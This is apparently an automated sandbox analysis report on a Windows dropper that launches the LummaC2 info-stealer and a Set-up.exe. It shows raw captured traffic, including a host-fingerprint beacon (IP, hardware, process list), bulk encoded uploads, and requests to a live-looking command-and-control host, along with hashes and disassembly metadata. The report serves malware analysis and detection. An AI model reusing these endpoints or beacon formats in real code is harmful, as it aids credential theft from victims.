                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241958875551", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
                                            Jan 12, 2025 17:45:21.941054106 CET4944OUTData Raw: 47 58 30 34 56 4b 30 4a 56 63 75 79 37 4e 63 53 71 73 6f 7a 53 70 52 57 45 63 4a 4e 50 6e 6e 42 61 76 38 64 4b 4b 5c 2f 72 44 62 5c 2f 41 49 49 7a 5c 2f 73 62 35 49 44 66 46 77 63 6b 63 65 4f 74 4f 5c 2f 77 44 5a 76 43 78 71 71 5c 2f 38 41 77 52
                                            Data Ascii: GX04VK0JVcuy7NcSqsozSpRWEcJNPnnBav8dKK\/rDb\/AIIz\/sb5IDfFwckceOtO\/wDZvCxqq\/8AwRo\/Y7wCJ\/i+Mg9PHOk9t397wifSv5yX05fCZ\/8ANO+Iv\/hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38
                                            Jan 12, 2025 17:45:21.941068888 CET4944OUTData Raw: 66 69 6e 74 4a 38 7a 4a 39 2b 4f 50 39 31 5c 2f 71 75 4f 5c 2f 2b 6c 5a 39 4b 66 4a 47 36 37 4e 69 66 7a 2b 30 66 58 74 37 66 5c 2f 58 4e 5a 6d 68 2b 35 44 5c 2f 65 50 34 66 79 46 4e 70 37 39 66 77 5c 2f 71 61 5a 58 46 79 50 79 5c 2f 72 35 48 2b
                                            Data Ascii: fintJ8zJ9+OP91\/quO\/+lZ9KfJG67Nifz+0fXt7f\/XNZmh+5D\/eP4fyFNp79fw\/qaZXFyPy\/r5H+T5+un7EHiO7n+C+o6MtwzWmn+L9X0+70yfbc6fe201rperRrf6ZcmexvbZ5tQuVEN1bPA7JLmJjvd\/fde+Fvw08S+ZJe+Fl0S+k3u2peDbpdAaSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\
                                            Jan 12, 2025 17:45:21.941119909 CET7416OUTData Raw: 58 70 6a 39 50 78 5c 2f 6f 61 66 53 4d 43 33 35 35 6f 4f 67 67 5c 2f 69 32 39 5c 2f 30 36 34 71 4c 59 66 62 5c 2f 50 34 56 4b 5c 2f 38 41 72 44 5c 2f 75 6a 2b 6c 46 41 46 65 6f 5c 2f 4c 39 5c 2f 30 5c 2f 38 41 72 31 5a 66 70 2b 50 39 44 55 56 42
                                            Data Ascii: Xpj9Px\/oafSMC355oOgg\/i29\/064qLYfb\/P4VK\/8ArD\/uj+lFAFeo\/L9\/0\/8Ar1Zfp+P9DUVB1Uun+H\/Iqv8AdP4fzFQt8uc9vSrnl+\/6f\/XqOg2K9Mfp+P8AQ09l7Ef59RUcnb8f6UHQR1H5fv8Ap\/8AXqSig1ht8\/0RVZd34VD\/AOgf5\/Dp\/nFXPL9\/0\/8Ar1WaP2+T+QH+eMZ96Dp9\/wDu\/iQyL
                                            Jan 12, 2025 17:45:21.941243887 CET2472OUTData Raw: 32 4a 74 4b 38 47 65 58 35 6a 4a 4a 34 47 38 47 69 35 31 43 79 30 43 65 4e 35 70 4a 4c 53 57 34 31 48 56 76 37 49 6b 32 54 61 41 75 6b 58 42 75 4a 72 6a 38 5a 78 33 47 57 54 56 73 71 79 62 4c 2b 4b 50 46 4c 42 63 62 63 4c 63 4e 31 38 72 78 75 42
                                            Data Ascii: 2JtK8GeX5jJJ4G8Gi51Cy0CeN5pJLSW41HVv7Ik2TaAukXBuJrj8Zx3GWTVsqybL+KPFLBcbcLcN18rxuB4UyLg3M8j4l4jqZFhZYPIcv4ozvMciy\/CUcJgsJUlgZ4n+3OJK2DwM68cFSxWJdGrH+kMDwbnNHNc4zDhfwtxvBHFPElHM8Fj+K894yyzPOGuHKee4qnjc+zDhfJcuz3MMXWxmNxdNY6nhf7D4boYvHwoSxtbC4Z
                                            Jan 12, 2025 17:45:21.941272974 CET2472OUTData Raw: 5c 2f 6e 36 5c 2f 79 5c 2f 6e 55 77 48 37 75 46 4e 6c 78 5c 2f 32 7a 5c 2f 66 32 5c 2f 77 43 66 2b 65 6c 4d 5c 2f 76 76 2b 38 54 76 35 6e 5c 2f 74 72 5c 2f 6e 6a 70 51 64 42 44 35 66 6d 4b 5c 2f 6b 70 38 2b 66 4e 48 37 72 36 38 6a 5c 2f 50 34 5a
                                            Data Ascii: \/n6\/y\/nUwH7uFNlx\/2z\/f2\/wCf+elM\/vv+8Tv5n\/tr\/njpQdBD5fmK\/kp8+fNH7r68j\/P4Zojj+588Y8z\/AJZ+V\/5K9f8AP40SQwssb7M9f8\/5\/XueXIsab0kmT\/W++fXr6f5PfP2fn+H\/AAS+d+X9fMhkZ2Lu77B\/q\/8AVW2f8\/p\/Vm3dvd08l5P8\/Tvjn+lPSMbX\/cx7Mfx\/Ti1\/6\/u9Mkz
                                            Jan 12, 2025 17:45:21.941293955 CET2472OUTData Raw: 2f 4c 7a 6c 59 72 56 62 57 45 41 62 54 47 52 74 32 2b 47 65 4b 50 69 7a 34 77 38 57 76 4b 74 5c 2f 71 64 78 46 59 79 46 73 61 66 48 4d 30 46 6f 46 50 52 58 68 67 45 4d 45 78 41 4f 30 53 53 51 37 38 5a 79 32 57 62 64 35 4e 6f 47 70 61 54 34 70 38
                                            Data Ascii: /LzlYrVbWEAbTGRt2+GeKPiz4w8WvKt\/qdxFYyFsafHM0FoFPRXhgEMExAO0SSQ78Zy2Wbd5NoGpaT4p8ZfD\/wAB6J4h8Lt4h+JfxB8F\/DTw0L\/XIoNPHiPx3r9j4b0RtRm0+DVb6GwXUdQga8ls9Mv7qO3Ej29ncyhIH5XQfiB4Z16K7aDWNGWWz1jVNDljTVbd1lvdIumtLo2vnra3EsJlQmJntYZChUvFGxKD8Rwvg39
                                            Jan 12, 2025 17:45:21.945930958 CET4944OUTData Raw: 35 6a 5a 6d 55 66 4d 41 41 65 56 50 49 41 72 36 54 49 75 4e 4f 46 65 4a 73 54 57 77 65 51 35 35 67 63 30 78 57 48 77 64 4c 4d 4b 39 44 43 7a 6c 4b 70 53 77 56 66 48 59 5c 2f 4c 61 57 49 6e 47 55 49 32 68 50 48 35 58 6d 47 46 5c 2f 6d 56 62 43 56
                                            Data Ascii: 5jZmUfMAAeVPIAr6TIuNOFeJsTWweQ55gc0xWHwdLMK9DCzlKpSwVfHY\/LaWInGUI2hPH5XmGF\/mVbCVYySsr\/H8TeHnG3BuFwuN4o4bzLJMJjcVPBYWvjqcIQrYunl+X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIP
                                            Jan 12, 2025 17:45:21.945986032 CET4944OUTData Raw: 48 32 5c 2f 7a 2b 46 42 76 54 71 66 72 5a 32 33 5c 2f 72 2b 76 4f 70 55 63 76 33 7a 5c 2f 41 4a 37 6d 72 4f 50 76 39 38 5c 2f 7a 36 5c 2f 31 71 74 5c 2f 79 30 5c 2f 77 41 5c 2f 33 61 32 39 5c 2f 77 44 75 5c 2f 69 57 4d 6b 2b 37 39 5c 2f 77 44 7a
                                            Data Ascii: H2\/z+FBvTqfrZ23\/r+vOpUcv3z\/AJ7mrOPv98\/z6\/1qt\/y0\/wA\/3a29\/wDu\/iWMk+79\/wDz+Z\/x\/Diofz35\/wA+2Mf5xU8vf\/d\/xqDv\/f8Az4\/mKxOgH6\/h\/U1Xfr+FS1BJ\/wB8f5\/z7+9B0Fdg\/wDc+T\/pnn19vw\/zmmNnv6jp\/r+nb3qwn3R+P8zUUkf9\/wD7a\/569z\/kCg0+s\/1b\/
                                            Jan 12, 2025 17:45:21.946018934 CET4944OUTData Raw: 6c 4b 65 4b 77 30 4b 56 50 46 5a 68 68 38 5a 33 63 46 66 74 41 38 38 34 51 34 4a 34 59 34 4c 66 68 31 77 39 6d 2b 47 34 58 77 4f 56 34 58 42 59 72 48 56 38 52 4b 64 53 72 6c 4f 65 59 6a 69 43 68 55 71 30 58 4b 56 46 55 38 54 6a 71 38 61 57 50 6a
                                            Data Ascii: lKeKw0KVPFZhh8Z3cFftA884Q4J4Y4Lfh1w9m+G4XwOV4XBYrHV8RKdSrlOeYjiChUq0XKVFU8Tjq8aWPjQhQq4vBYbB4etWlLBYOth\/N\/Dvxk8R\/HL4qL491vxBdeL9S1P9mz9lay+JnizUNN17TNV1\/4\/wDhv4D\/AA58NfG6\/wBZGv6Zptxq+sTfEDTNe\/tPxLbrd2XiS8WbW7bU9WW+bUbiX49aZeaz8H\/H2mWE
                                            Jan 12, 2025 17:45:21.946063995 CET4944OUTData Raw: 6a 65 49 73 7a 78 30 4d 50 67 5c 2f 62 5a 70 69 38 62 6d 39 58 4e 35 34 53 6a 4f 70 51 6e 56 79 76 4c 31 50 45 59 6e 43 79 77 2b 58 56 63 4e 4c 46 59 54 47 59 32 6c 6a 36 6d 4d 65 4c 72 53 6c 6c 78 66 39 4e 44 6a 44 6a 4c 4a 4f 4b 65 47 38 32 79
                                            Data Ascii: jeIszx0MPg\/bZpi8bm9XN54SjOpQnVyvL1PEYnCyw+XVcNLFYTGY2lj6mMeLrSllxf9NDjDjLJOKeG82yLA18hznhvBcMZLldXF46WFyPC4TJMHkjzCpTjiIUc2zatTwGAxTxeZ0cVHDYvLstq5bSwCwGGjTsN8uc9vSvlH47eI7rTP2bP2pf2ePD99a2Hiz4weNvhh\/wgUS6D4huNYHwv8aaTrWp\/tV6BpPiqysrrRvDmje
                                            Jan 12, 2025 17:45:25.949558020 CET138INHTTP/1.1 200 OK
                                            server: nginx/1.22.1
                                            date: Sun, 12 Jan 2025 16:45:25 GMT
                                            content-type: text/html; charset=utf-8
                                            content-length: 1
                                            Data Raw: 30
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549744176.53.147.104803128C:\Users\user\AppData\Local\Temp\Set-up.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 12, 2025 17:45:26.282490015 CET99OUTGET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1
                                            Host: home.twelve12vs.top
                                            Accept: */*
                                            Jan 12, 2025 17:45:27.083122015 CET353INHTTP/1.1 404 NOT FOUND
                                            server: nginx/1.22.1
                                            date: Sun, 12 Jan 2025 16:45:26 GMT
                                            content-type: text/html; charset=utf-8
                                            content-length: 207
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549761176.53.147.104803128C:\Users\user\AppData\Local\Temp\Set-up.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 12, 2025 17:45:28.065629959 CET172OUTPOST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1
                                            Host: home.twelve12vs.top
                                            Accept: */*
                                            Content-Type: application/json
                                            Content-Length: 31
                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                            Data Ascii: { "id1": "0", "data": "Done1" }
                                            Jan 12, 2025 17:45:28.951916933 CET353INHTTP/1.1 404 NOT FOUND
                                            server: nginx/1.22.1
                                            date: Sun, 12 Jan 2025 16:45:28 GMT
                                            content-type: text/html; charset=utf-8
                                            content-length: 207
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.5497203.210.94.604433128C:\Users\user\AppData\Local\Temp\Set-up.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-12 16:45:19 UTC52OUTGET /ip HTTP/1.1
                                            Host: httpbin.org
                                            Accept: */*
                                            2025-01-12 16:45:19 UTC224INHTTP/1.1 200 OK
                                            Date: Sun, 12 Jan 2025 16:45:19 GMT
                                            Content-Type: application/json
                                            Content-Length: 31
                                            Connection: close
                                            Server: gunicorn/19.9.0
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Credentials: true
                                            2025-01-12 16:45:19 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                            Data Ascii: { "origin": "8.46.123.189"}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:11:45:17
                                            Start date:12/01/2025
                                            Path:C:\Users\user\Desktop\jo0PnKm2Lg.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\jo0PnKm2Lg.exe"
                                            Imagebase:0x950000
                                            File size:8'259'584 bytes
                                            MD5 hash:8398FC4AA3A5A5AB6AE7ED394B449D0A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:11:45:17
                                            Start date:12/01/2025
                                            Path:C:\Users\user\AppData\Local\Temp\LummaC2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
                                            Imagebase:0xdf0000
                                            File size:328'192 bytes
                                            MD5 hash:8DA89B163D506BE4A73B987517A1B9E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 68%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:3
                                            Start time:11:45:18
                                            Start date:12/01/2025
                                            Path:C:\Users\user\AppData\Local\Temp\Set-up.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\Set-up.exe"
                                            Imagebase:0xf70000
                                            File size:7'920'776 bytes
                                            MD5 hash:53D48938C0EC850EB316CF433ECFC045
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 018A0A08 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8aq
                                              • API String ID: 0-538729646
                                              • Opcode ID: 7a7e338895234b971f1cd3332d9063c69627a3d3e2fd2cf488018dde59c6de47
                                              • Instruction ID: 72a7f49cd3cb05d533e5db87d31125210671697adcfa6c240fa94b9bc43e2067
                                              • Opcode Fuzzy Hash: 7a7e338895234b971f1cd3332d9063c69627a3d3e2fd2cf488018dde59c6de47
                                              • Instruction Fuzzy Hash: C87116317002018FE724EB78D094B29BBA6FB85314F958069E509CB395DB34FD42CB81
                                              Function 018A0590 Relevance: .4, Instructions: 447COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63b5960ea41c97268f837f63a6618240ee0552d1329f8e99cf061922b802cd22
                                              • Instruction ID: cf4dffc4c112fb2876eae6b05bb134c06a670c20dbd397efaedac3a965726324
                                              • Opcode Fuzzy Hash: 63b5960ea41c97268f837f63a6618240ee0552d1329f8e99cf061922b802cd22
                                              • Instruction Fuzzy Hash: 1951FA34A0134ACFCB15DFB4E69069EBBB6FF46304F5085A9C404AB254DB3A594ACF92
                                              Function 018A0848 Relevance: .1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c46f672333b7b954593badbbd7e33998d22d27ce860d63fc443c231e7459d3c
                                              • Instruction ID: 2f11f968cc448737dd6e95590204bb79e8077e071d2e0edf1cb73d1f0c506fef
                                              • Opcode Fuzzy Hash: 7c46f672333b7b954593badbbd7e33998d22d27ce860d63fc443c231e7459d3c
                                              • Instruction Fuzzy Hash: 1741ED34A0120ACFCB15DFB4E69069EBBB6FF46304F508569C414AB354DB3A5D4ACF92
                                              Function 018A0C90 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2189682913.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_18a0000_jo0PnKm2Lg.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd39159852ff5e1223f93930b5b5e76d2b23a3d4679635ee401a4105bcdbb4a0
                                              • Instruction ID: 436e1eb0ae406bfbe565c6bdb136005818b022dfefbe5ae36c1063464aec7765
                                              • Opcode Fuzzy Hash: fd39159852ff5e1223f93930b5b5e76d2b23a3d4679635ee401a4105bcdbb4a0
                                              • Instruction Fuzzy Hash: AD312432B002164BDB05DBBDD5805AEBBF5EF84714F54416AE449DB242DB34EE06CBD2

                                              Execution Graph

                                              Execution Coverage:1.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:46.3%
                                              Total number of Nodes:54
                                              Total number of Limit Nodes:2
                                              execution_graph 14117 e32ae2 14118 e32b0e 14117->14118 14119 e32af3 14117->14119 14119->14118 14121 e323f0 LdrInitializeThunk 14119->14121 14121->14118 14122 e2c010 14124 e2c307 14122->14124 14123 e2c5c0 14124->14123 14126 e323f0 LdrInitializeThunk 14124->14126 14126->14124 14132 e32610 14133 e3274f GetForegroundWindow 14132->14133 14134 e3275f 14133->14134 14135 e35930 14136 e3596f 14135->14136 14137 e35949 14135->14137 14137->14136 14141 e323f0 LdrInitializeThunk 14137->14141 14139 e35998 14139->14136 14142 e323f0 LdrInitializeThunk 14139->14142 14141->14139 14142->14136 14143 e33075 14144 e32fe0 14143->14144 14144->14143 14145 e323f0 LdrInitializeThunk 14144->14145 14145->14144 14146 e32d3b 14147 e32d45 14146->14147 14148 e32e2e 14147->14148 14152 e323f0 LdrInitializeThunk 14147->14152 14151 e323f0 LdrInitializeThunk 14148->14151 14151->14148 14152->14148 14153 e3308f 14155 e330ce 14153->14155 14156 e330a9 14153->14156 14154 e3313e 14155->14154 14159 e323f0 LdrInitializeThunk 14155->14159 14156->14155 14160 e323f0 LdrInitializeThunk 14156->14160 14159->14154 14160->14155 14161 e3296e 14163 e32990 14161->14163 14162 e329df 14163->14162 14165 e323f0 LdrInitializeThunk 14163->14165 14165->14162 14166 df8730 14168 df873f 14166->14168 14167 df8a67 ExitProcess 14168->14167 14169 df8754 GetCurrentProcessId GetCurrentThreadId 14168->14169 14177 df8a59 14168->14177 14170 df877e SHGetSpecialFolderPathW GetForegroundWindow 14169->14170 14171 df877a 14169->14171 14173 df88be 14170->14173 14171->14170 14181 e30b80 14173->14181 14175 df89c0 14176 df8a50 14175->14176 14184 dfcc70 CoInitializeEx 14175->14184 14176->14177 14185 e32350 14177->14185 14188 e33b10 14181->14188 14183 e30b8a RtlAllocateHeap 14183->14175 14190 e33af0 14185->14190 14187 e32355 FreeLibrary 14187->14167 14189 e33b40 14188->14189 14189->14183 14189->14189 14191 e33af9 14190->14191 14191->14187

                                              Executed Functions

                                              Function 00E2C010 Relevance: 55.4, Strings: 44, Instructions: 361COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 e2c010-e2c302 1 e2c307-e2c317 0->1 1->1 2 e2c319 1->2 3 e2c31b-e2c320 2->3 4 e2c322-e2c368 3->4 5 e2c36a-e2c3a3 3->5 4->3 6 e2c3a5-e2c3a8 5->6 7 e2c3c1-e2c458 6->7 8 e2c3aa-e2c3bf 6->8 9 e2c45d-e2c46b 7->9 8->6 9->9 10 e2c46d 9->10 11 e2c46f-e2c472 10->11 12 e2c4b0-e2c4e4 11->12 13 e2c474-e2c4ae 11->13 14 e2c4e6-e2c4e9 12->14 13->11 15 e2c502-e2c567 14->15 16 e2c4eb-e2c500 14->16 17 e2c56c-e2c57a 15->17 16->14 17->17 18 e2c57c 17->18 19 e2c57e-e2c581 18->19 20 e2c583-e2c5ae 19->20 21 e2c5b0-e2c5b6 19->21 20->19 22 e2c5b8-e2c5be 21->22 23 e2c5c0 22->23 24 e2c5c5-e2c5d7 22->24 25 e2c64b-e2c683 23->25 26 e2c5db-e2c5e2 24->26 27 e2c5d9 24->27 28 e2c63c-e2c63f 26->28 29 e2c5e4-e2c631 call e323f0 26->29 27->28 31 e2c643-e2c646 28->31 32 e2c641 28->32 33 e2c636-e2c639 29->33 31->22 32->25 33->28
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !$$$&$($*$0$4$5$6$6$<$=$>$A$A$A$C$E$G$I$K$M$O$Q$S$U$W$Y$[$\$]$]$_$c$g$h$k$l$u$w$w$z$}$}
                                              • API String ID: 0-4139699962
                                              • Opcode ID: 7734422600bed35e36f2a3215b9a50e3fe29479313ce5bea4786192f3a99e5c9
                                              • Instruction ID: b23b07fe90de61d792658083a059b2d21c41f7ce18ff73828aaa618701da3788
                                              • Opcode Fuzzy Hash: 7734422600bed35e36f2a3215b9a50e3fe29479313ce5bea4786192f3a99e5c9
                                              • Instruction Fuzzy Hash: 0E120C219087E9C9DB32C67C8C087CDBFA15B63324F1843D9D4E96B2D2D7754A86CB62
                                              Function 00DF8730 Relevance: 7.8, APIs: 5, Instructions: 262threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00DF8754
                                              • GetCurrentThreadId.KERNEL32 ref: 00DF875E
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00DF8809
                                              • GetForegroundWindow.USER32 ref: 00DF88B1
                                              • ExitProcess.KERNEL32 ref: 00DF8A69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                              • String ID:
                                              • API String ID: 4063528623-0
                                              • Opcode ID: 414af9b2920d640aa4d340650c30cfd9cc8689d452b4aede19d11ef5e85f46a1
                                              • Instruction ID: 903b1fa119a572b2847756c6dadf7aef9ae9150204b9e9dd795ad36c77a5ce6e
                                              • Opcode Fuzzy Hash: 414af9b2920d640aa4d340650c30cfd9cc8689d452b4aede19d11ef5e85f46a1
